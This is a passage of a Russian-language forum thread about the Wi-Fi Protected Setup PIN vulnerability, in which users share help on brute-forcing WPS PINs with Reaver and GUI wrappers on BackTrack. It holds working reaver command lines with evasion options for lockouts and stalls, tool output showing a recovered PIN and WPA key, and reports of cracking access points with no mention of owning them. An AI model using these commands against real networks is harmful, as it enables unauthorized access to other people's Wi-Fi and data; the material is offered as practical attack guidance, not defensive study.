Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. po19s122

    po19s122 New Member

    Joined:
    16 Apr 2012
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Привет. Может у кого есть Inflator для BT5, а то скачать негде. выложите куда нибудь. Заранее спасибо.
     
  2. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,811
    Likes Received:
    18,432
    Reputations:
    377
    Держи
     
    _________________________
  3. Mister Smith

    Mister Smith New Member

    Joined:
    19 Dec 2011
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Господа, не подскажите где можно почитать каким образом river на основе PIN получает сам ключ?
     
  4. me4

    me4 New Member

    Joined:
    1 Aug 2010
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Еще раз запустил reaver, на эту точку, и он мне выдал уже pin и реальный пасс. Ломал в Inflator 1.0 (это графическая оболочка для reaver)
     
  5. buruznyk

    buruznyk New Member

    Joined:
    4 Apr 2012
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Аналогичная ситуация ,только еще AP SSID другой.
    [+] 97.99% complete @ 2012-03-28 08:18:36 (13 seconds/pin)
    [+] 98.02% complete @ 2012-03-28 08:19:24 (13 seconds/pin)
    [+] WPS PIN: '41257814'
    [+] WPA PSK: 'C15914024184CE3773534FE12D4C9C450BCB4466BEDCD42442C8E49D59AD4D0F'
    [+] AP SSID: 'Network-f4ec38cb4440'
    root@bt:~#
    Использовал BT5R2 ,wifiway-3.4 ,xiaopan-0.3.8 , с inflator1.0 и чисто в терминале ,перебрал все опции,результат одинаковый, отличается только WPA PSK .
     
  6. ak_45

    ak_45 Banned

    Joined:
    16 Dec 2011
    Messages:
    82
    Likes Received:
    7
    Reputations:
    0
    ну скока можно одно и то же мусолить...дали же ссылку в посте 185...читай и делай...
     
  7. kykyry3ka

    kykyry3ka New Member

    Joined:
    18 Apr 2012
    Messages:
    21
    Likes Received:
    0
    Reputations:
    0
    Такая петрушка, пробил ещё раз уже по этому-же пину через инфлятор ,и выдал реальный пасс ,нормально подключился.Классная вещь!
     
  8. costanda

    costanda New Member

    Joined:
    24 Apr 2012
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Перебор пинкода доходит до 99,99 % и буксует на одном и том же пинкоде постоянно на двух точках с сигналом 45-50. Подскажите пожалуйста можно как нибудь это исправить или забыть про точки?
     
  9. kykyry3ka

    kykyry3ka New Member

    Joined:
    18 Apr 2012
    Messages:
    21
    Likes Received:
    0
    Reputations:
    0
    costanda
    Какие команды вводишь? Некоторые точки доступа могут блокировать WPS на определенное время. Reaver делает паузу в переборе на 315 секунд по умолчанию, длительность этой паузы можно менять: reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx --lock-delay=320
     
  10. costanda

    costanda New Member

    Joined:
    24 Apr 2012
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Ввожу команду reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx - итог 99,99 % и буксует на пине 12349982 и на команде reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx -vv --dh-small тоже самое. И так на двух разных точках доступа но PIN разные.
     
  11. kykyry3ka

    kykyry3ka New Member

    Joined:
    18 Apr 2012
    Messages:
    21
    Likes Received:
    0
    Reputations:
    0
    costanda
    Попробуй так:(-E) --eap-terminate. Опция предназначена для работы с теми АР, которые требуют завершения WPS-сессии с помощью сообщения ЕАР FAIL:
    reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx --eap-terminate
     
  12. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,811
    Likes Received:
    18,432
    Reputations:
    377
    Вариант первый:
    1. Запишите первые 4 цифры PIN- на котором Reaver застрял на - 99,99%
    2. Запустите Reaver со следующим префиксом:
    reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx -p 1111 -S -v

    Где -p 1111 - первые четыре цифры пина на котором
    застрял Reaver.

    Совет взят с офф. форума программы: тык
    Судя по всему помогает не всем и не всегда (кое-кто на оф. форуме в связи с этой проблемой советует откатиться на версию 1.3 , но как по мне -это уже перебор).

    Как второй вариант - начинать перебор с префиксом "-p ХХХХ" указав число, следующее сразу за первой подобранной четверкой цифр:
    то есть если у Вас в пине идет: Trying pin 1111хххх, то в reaver выставить префикс: -p 1112.
     
    _________________________
    #192 user100, 4 May 2012
    Last edited: 5 May 2012
  13. courier

    courier New Member

    Joined:
    3 May 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Прочитав ветку, тоже решил попробовать использовать reaver.
    Что хочу сказать - работает!!! Правда в отличии от оф. описания, где написано, что подбор может продолжаться от 4 до 10 часов, у меня ушли сутки! Но как результат - точка сдалась. WPA2 PSK, пароль 14 символов. До этого ломал по словарям, долго мучался - результат 0, да и сомневаюсь я что такой пароль мог бы оказаться в каком либо словаре. Использовался BT5R2.

    P.S. Да, ещё добавлю, адаптер TL-WN7200ND, драйвера установил как рекомендовали выше. Сигнал от точки был в районе -70...-80. Мощность в адаптере менял до 27дБ. но на скорости это не сказалось, так что оставил 20дБ.
     
    #193 courier, 5 May 2012
    Last edited: 5 May 2012
  14. costanda

    costanda New Member

    Joined:
    24 Apr 2012
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    " Совет взят с офф. форума программы: тык
    Судя по всему помогает не всем и не всегда (кое-кто на оф. форуме в связи с этой проблемой советует откатиться на версию 1.3 , но как по мне -это уже перебор)."


    user100 Спасибо большое. Помог вариант с откатом на версию reaver1.3.
     
  15. Rastamanka

    Rastamanka Elder - Старейшина

    Joined:
    26 Nov 2008
    Messages:
    429
    Likes Received:
    11
    Reputations:
    7
    Подскажите не могу установить WPSCrackGui ярлык создается при запуске тупит и не запускается в итоге. При установке пишет

    Code:
    sudo dpkg -i wps*
    Selecting previously deselected package wpscrackgui.
    (Reading database ... 237408 files and directories currently installed.)
    Unpacking wpscrackgui (from wpscrackgui_1.1.7-1_airubuntu.deb) ...
    dpkg: dependency problems prevent configuration of wpscrackgui:
     wpscrackgui depends on gambas2-runtime (>= 1.9.48); however:
      Package gambas2-runtime is not installed.
     wpscrackgui depends on gambas2-runtime (<< 2.90); however:
      Package gambas2-runtime is not installed.
     wpscrackgui depends on gambas2-gb-gui (>= 1.9.48); however:
      Package gambas2-gb-gui is not installed.
     wpscrackgui depends on gambas2-gb-gui (<< 2.90); however:
      Package gambas2-gb-gui is not installed.
     wpscrackgui depends on gambas2-gb-form (>= 1.90.1); however:
      Package gambas2-gb-form is not installed.
     wpscrackgui depends on gambas2-gb-form (<< 2.90.0); however:
      Package gambas2-gb-form is not installed.
     wpscrackgui depends on gambas2-gb-desktop (>= 1.9.48); however:
      Package gambas2-gb-desktop is not installed.
     wpscrackgui depends on gambas2-gb-desktop (<< 2.90); however:
      Package gambas2-gb-desktop is not installed.
    dpkg: error processing wpscrackgui (--install):
     dependency problems - leaving unconfigured
    Processing triggers for desktop-file-utils ...
    Processing triggers for python-gmenu ...
    Rebuilding /usr/share/applications/desktop.en_US.utf8.cache...
    Processing triggers for menu ...
    Processing triggers for python-support ...
    Errors were encountered while processing:
     wpscrackgui
    
    
     
  16. H3L1X

    H3L1X Active Member

    Joined:
    10 Apr 2012
    Messages:
    632
    Likes Received:
    215
    Reputations:
    170
    Ругается на то, что не установлен компонент, от которого зависим гуй. Попробуй сначала
    Code:
    apt-get install gambas2-ide
    а потом уже wpscrackgui устанавливать.
     
  17. uz5hz

    uz5hz New Member

    Joined:
    18 Sep 2011
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    wifislax 4.1 сборка похожая на wifiway,имеет драйвер для tplink 7200 nd.Находится здесь http://www.wifislax.com/category/download/nuevas-versiones/
     
    #197 uz5hz, 5 Jun 2012
    Last edited: 6 Jun 2012
  18. mahtey

    mahtey New Member

    Joined:
    6 Jun 2011
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Перебор пинкода доходит до 99,99 % и глохнет
    Простоял 2 суток пока набрал 90.03 % pin 9839 xxxx вторую часть нашол бистро , но встал на 99.99% с pin 98399987
    Пробовал вот так
    sudo reaver -i mon0 -b хх.хх.хх.хх.хх.хх -c 11 -e arris54g --pin 98390000 -vv
    начинает давать М5 М6 ,но потом рубит
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    Подскажите пожалуйста можно ли как нибудь это добить pin до 100%
    Как я понял первие 4 правильние осталось набрать последние 4
    По reaver 1.4 есть ли какие префиксьі типа -p --p -S
    Подскажите пожалуйста можно как нибудь это исправить
     
  19. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,811
    Likes Received:
    18,432
    Reputations:
    377
    Перечитай в этой теме пост #201 и пост #203 .
     
    _________________________
  20. Max_333

    Max_333 New Member

    Joined:
    28 Jul 2010
    Messages:
    38
    Likes Received:
    3
    Reputations:
    0
    Так и попробуй этот пин, на котором остановился брут 98399987. Поидее это предпоследний вариант, так что вероятность того что верным будет единственный оставшийся не очень велика.
    А если хочешь поновой перебрать вторую половину пина, то, если не ошибаюсь, при запуске нужно указать только первую часть пина
    Code:
    -p 9839